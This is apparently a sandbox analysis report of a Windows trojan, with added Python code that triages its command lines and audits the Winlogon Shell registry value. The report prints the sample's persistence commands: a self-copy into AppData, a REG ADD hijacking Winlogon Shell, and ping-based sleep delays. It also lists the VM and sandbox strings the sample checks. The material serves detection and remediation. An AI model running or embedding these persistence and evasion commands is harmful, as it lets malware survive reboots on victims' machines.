Source: atpRyiZGTE.exe, 00000000.00000002.444211680.000000000120C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamecw.exeF vs atpRyiZGTE.exe
Source: atpRyiZGTE.exe, 00000000.00000002.447907797.0000000003EF7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameNeWUsakdjfnsd.dll< vs atpRyiZGTE.exe
Source: atpRyiZGTE.exe, 00000000.00000002.453220816.0000000006B00000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameNeWUsakdjfnsd.dll< vs atpRyiZGTE.exe
Source: atpRyiZGTE.exe, 00000000.00000002.448862255.00000000048DB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTest.exe" vs atpRyiZGTE.exe
Source: atpRyiZGTE.exe, 00000000.00000002.450115307.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTest.exe" vs atpRyiZGTE.exe
Source: atpRyiZGTE.exe | Binary or memory string: OriginalFilenamecw.exeF vs atpRyiZGTE.exe
Source: atpRyiZGTE.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: atpRyiZGTE.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: atpRyiZGTE.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: atpRyiZGTE.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: atpRyiZGTE.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: atpRyiZGTE.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: atpRyiZGTE.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: atpRyiZGTE.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: atpRyiZGTE.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: LightKeeperService.exe.19.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: LightKeeperService.exe.19.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: LightKeeperService.exe.19.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: LightKeeperService.exe.19.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: LightKeeperService.exe.19.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: LightKeeperService.exe.19.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: LightKeeperService.exe.19.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: LightKeeperService.exe.19.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: LightKeeperService.exe.19.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\LightKeeperService.exe,"
                Source: atpRyiZGTE.exeReversingLabs: Detection: 42%
                Source: atpRyiZGTE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Users\user\Desktop\atpRyiZGTE.exe "C:\Users\user\Desktop\atpRyiZGTE.exe"
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 38 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\LightKeeperService.exe,
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 38
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 45 > nul && copy "C:\Users\user\Desktop\atpRyiZGTE.exe" "C:\Users\user\AppData\Roaming\LightKeeperService.exe" && ping 127.0.0.1 -n 45 > nul && "C:\Users\user\AppData\Roaming\LightKeeperService.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 45
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\LightKeeperService.exe,"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 45
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 38 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\LightKeeperService.exe,
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 45 > nul && copy "C:\Users\user\Desktop\atpRyiZGTE.exe" "C:\Users\user\AppData\Roaming\LightKeeperService.exe" && ping 127.0.0.1 -n 45 > nul && "C:\Users\user\AppData\Roaming\LightKeeperService.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 38
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\LightKeeperService.exe,"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 45
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 45
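                The two cmd.exe chains recorded above carry the sample's whole staging logic: ping 127.0.0.1 -n N > nul used as a sleep (N echo requests one second apart, so roughly N-1 seconds of delay, which is why the sandbox later counts 37 and 44 sleeps for -n 38 and -n 45), a copy of the running image into the user's AppData\Roaming directory followed by execution of that copy, and a REG ADD that rewrites the Winlogon Shell value. The following Python is an added triage example for such command lines; it is not code from the report or from Joe Sandbox. The command lines embedded in it are copied from the entries above, and the 30-second threshold mirrors the sandbox's own "> 30" reporting rule; the stage splitting assumes no && inside quoted arguments, which holds for these lines.

```python
import re

# Command lines as recorded in the report's "Process created" entries for
# cmd.exe (copied from the analysis above; the stray quote in cmd" is the
# report's rendering and is tolerated by the prefix regex).
SAMPLE_IMAGE = r"C:\Users\user\Desktop\atpRyiZGTE.exe"
SAMPLE_CMDLINES = [
    r'cmd" /c ping 127.0.0.1 -n 38 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\LightKeeperService.exe,',
    r'cmd" /c ping 127.0.0.1 -n 45 > nul && copy "C:\Users\user\Desktop\atpRyiZGTE.exe" "C:\Users\user\AppData\Roaming\LightKeeperService.exe" && ping 127.0.0.1 -n 45 > nul && "C:\Users\user\AppData\Roaming\LightKeeperService.exe',
]

PING_SLEEP = re.compile(r'^ping\s+127\.0\.0\.1\s+-n\s+(\d+)\b', re.I)
COPY_CMD = re.compile(r'^copy\s+"([^"]+)"\s+"([^"]+)"', re.I)
WINLOGON_SHELL = re.compile(r'^reg\s+add\s+"?[^"]*\\winlogon"?.*?/v\s+"?shell"?', re.I)
SLEEP_THRESHOLD_SECONDS = 30  # the sandbox flags sleeps above 30 s


def split_chain(cmdline):
    """Strip the cmd /c prefix and split a && chain into its stages."""
    body = re.sub(r'^cmd(?:\.exe)?"?\s+/c\s+', '', cmdline.strip(), flags=re.I)
    return [stage.strip() for stage in body.split('&&') if stage.strip()]


def ping_sleep_seconds(stage):
    """ping -n N against 127.0.0.1 waits one second between echo requests,
    so it blocks for about N-1 seconds (the report counts 37 for -n 38)."""
    m = PING_SLEEP.match(stage)
    return int(m.group(1)) - 1 if m else 0


def triage(cmdline, image):
    """Summarise one cmd.exe chain spawned by `image` (the sample's own path)."""
    stages = split_chain(cmdline)
    result = {
        'sleep_seconds': sum(ping_sleep_seconds(s) for s in stages),
        'copy_target': None,
        'executes_copy': False,
        'winlogon_shell': any(WINLOGON_SHELL.match(s) for s in stages),
    }
    for stage in stages:
        m = COPY_CMD.match(stage)
        if m and m.group(1).lower() == image.lower():
            result['copy_target'] = m.group(2)   # self-copy destination
    if result['copy_target']:
        target = result['copy_target'].lower()
        # A later stage that is just the copied path (quoted or not) runs it.
        result['executes_copy'] = any(
            s.strip('"').lower() == target for s in stages)
    result['suspicious'] = (
        result['sleep_seconds'] > SLEEP_THRESHOLD_SECONDS
        or result['executes_copy']
        or result['winlogon_shell'])
    return result


if __name__ == '__main__':
    for line in SAMPLE_CMDLINES:
        print(triage(line, SAMPLE_IMAGE))
```

                Run against the two recorded chains, the first yields 37 seconds of ping sleep plus the Winlogon Shell write, the second 88 seconds of sleep bracketing a self-copy that is then executed; a routine ping to a remote host with a small -n is left alone.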
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\atpRyiZGTE.exe.log
                Source: classification engine | Classification label: mal96.troj.evad.winEXE@15/5@1/3
                Source: atpRyiZGTE.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6740:120:WilError_01
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4148:120:WilError_01
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | File read: C:\Windows\System32\drivers\etc\hosts (entry repeated twice in the report)
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: atpRyiZGTE.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
                Source: atpRyiZGTE.exe | Static file information: File size 1598976 > 1048576
                Source: atpRyiZGTE.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: atpRyiZGTE.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x168600
                Source: atpRyiZGTE.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Code function: 0_2_009921CD push FFFFFF8Bh; iretd
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Code function: 0_2_00FE8355 push eax; retf 5502h
                Source: atpRyiZGTE.exe, Bo6/a8C.cs | High entropy of concatenated method names: '.ctor', 'Ki3', 'p4J', 'Nz0', 'Bt6', 'Mk3', 'Si9', 'Wp6', 'd8B', 'Wk7'
                Source: atpRyiZGTE.exe, w0XGc7/Mr7n6D.cs | High entropy of concatenated method names: '.ctor', 'f9WBp6', 'Gf13Tw', 'Qj28Bz', 'y1Y8Ri', 'r3E1Tx', 'Hi39Fa', 'Cf89Kt', 'w5P8Kp', 'f3JEb0'
                Source: atpRyiZGTE.exe, Kj87Xi/Xn05Ce.cs | High entropy of concatenated method names: '.ctor', 'q0M8Ss', 'x0Q5Wf', 'No60Js', 'Lr01Db', 'q5DSj2', 'Ci8o1H', 'x3K4Lj', 'y5QEj4', 'Kk68Yd'
                Source: atpRyiZGTE.exe, Dp4o9T/Sy50Xx.cs | High entropy of concatenated method names: '.ctor', 'j4FLp8', 'Ho3s2F', 'd3J2Be', 'Bt6z9M', 'g1MZw6', 'As86Wi', 'Ww52Sr', 'Cs51Ki', 'x6QJj2'
                Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Roaming\LightKeeperService.exe

                Boot Survival

                Source: C:\Windows\SysWOW64\reg.exe | Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
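                The Shell value under the Winlogon key is a comma-separated list of programs Winlogon launches at logon. By default it exists only under HKLM and holds explorer.exe; the sample creates a per-user copy under HKCU, which takes precedence for that user, and appends its own dropped copy (C:\Users\user\AppData\Roaming\LightKeeperService.exe, followed by a trailing comma) so that it starts alongside the real shell. The following Python audits such a value and emits the remediation steps; it is an added example, not part of the report. The reg.exe command line it parses is the one recorded above. The rule that a clean value is exactly explorer.exe with no path is my assumption, chosen so that a rogue binary merely named explorer.exe in another directory is still flagged.

```python
import re

# reg.exe command line as recorded in the report's "Process created" entry
# (copied from the analysis above; note the trailing comma in the data).
SAMPLE_REG_CMDLINE = (
    r'REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" '
    r'/f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\LightKeeperService.exe,"'
)

WINLOGON_KEY = r'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon'
# Assumption: the only legitimate entry is the bare name explorer.exe.
EXPECTED_SHELL = 'explorer.exe'


def shell_data_from_cmdline(cmdline):
    """Pull the /d payload out of a reg add command line (None if absent)."""
    m = re.search(r'/d\s+"([^"]*)"', cmdline, re.I)
    return m.group(1) if m else None


def parse_shell_value(data):
    """Winlogon runs every comma-separated entry; empty entries (trailing
    comma) are ignored, as Winlogon ignores them."""
    return [p.strip() for p in data.split(',') if p.strip()]


def rogue_shell_entries(data):
    """Anything other than the bare explorer.exe is a rogue shell entry.
    A full path to a file named explorer.exe is deliberately not excused."""
    return [p for p in parse_shell_value(data) if p.lower() != EXPECTED_SHELL]


def remediation(data):
    """Commands an analyst would run on the host; empty when the value is clean."""
    rogue = rogue_shell_entries(data)
    if not rogue:
        return []
    # Delete the per-user value rather than rewriting it: with it gone, the
    # HKLM default (explorer.exe) applies again for this user.
    steps = [f'reg delete "{WINLOGON_KEY}" /v Shell /f']
    steps += [f'del /f "{p}"' for p in rogue]
    return steps


if __name__ == '__main__':
    data = shell_data_from_cmdline(SAMPLE_REG_CMDLINE)
    print('Shell entries :', parse_shell_value(data))
    print('Rogue entries :', rogue_shell_entries(data))
    for step in remediation(data):
        print('Remediate     :', step)
```

                On a live host the same functions would be fed the Shell data read from the registry instead of the command line; the point of deleting the HKCU value rather than resetting it to explorer.exe is that the per-user value should not exist at all on a clean machine.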

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | File opened: C:\Users\user\Desktop\atpRyiZGTE.exe\:Zone.Identifier read attributes | delete
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Process information set: NOOPENFILEERRORBOX (entry repeated 55 times in the report)

                Malware Analysis System Evasion

                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 38
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 45
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 45
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 38
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 45
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 45
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe TID: 6756 | Thread sleep time: -28592453314249787s >= -30000s
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe TID: 6756 | Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6796 | Thread sleep count: 37 > 30
                Source: C:\Windows\SysWOW64\PING.EXE TID: 6796 | Thread sleep time: -37000s >= -30000s
                Source: C:\Windows\SysWOW64\PING.EXE TID: 4284 | Thread sleep count: 44 > 30
                Source: C:\Windows\SysWOW64\PING.EXE TID: 4284 | Thread sleep time: -44000s >= -30000s
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Windows\SysWOW64\PING.EXE | Last function: Thread delayed
                Source: C:\Windows\SysWOW64\PING.EXE | Last function: Thread delayed
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Window / User API: threadDelayed 4246
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Window / User API: threadDelayed 5455
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Thread delayed: delay time: 30000
                Source: atpRyiZGTE.exe, 00000000.00000002.445231000.0000000002EE7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware VGAuth
                Source: atpRyiZGTE.exe, 00000000.00000002.445231000.0000000002EE7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: sandboxierpcss#SOFTWARE\VMware, Inc.\VMware VGAuth
                Source: atpRyiZGTE.exe, 00000000.00000002.445231000.0000000002EE7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VBoxTray6
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Memory allocated: page read and write | page guard
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 38 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\LightKeeperService.exe,
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 45 > nul && copy "C:\Users\user\Desktop\atpRyiZGTE.exe" "C:\Users\user\AppData\Roaming\LightKeeperService.exe" && ping 127.0.0.1 -n 45 > nul && "C:\Users\user\AppData\Roaming\LightKeeperService.exe
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 38
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\LightKeeperService.exe,"
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 45
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 45
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Users\user\Desktop\atpRyiZGTE.exe VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
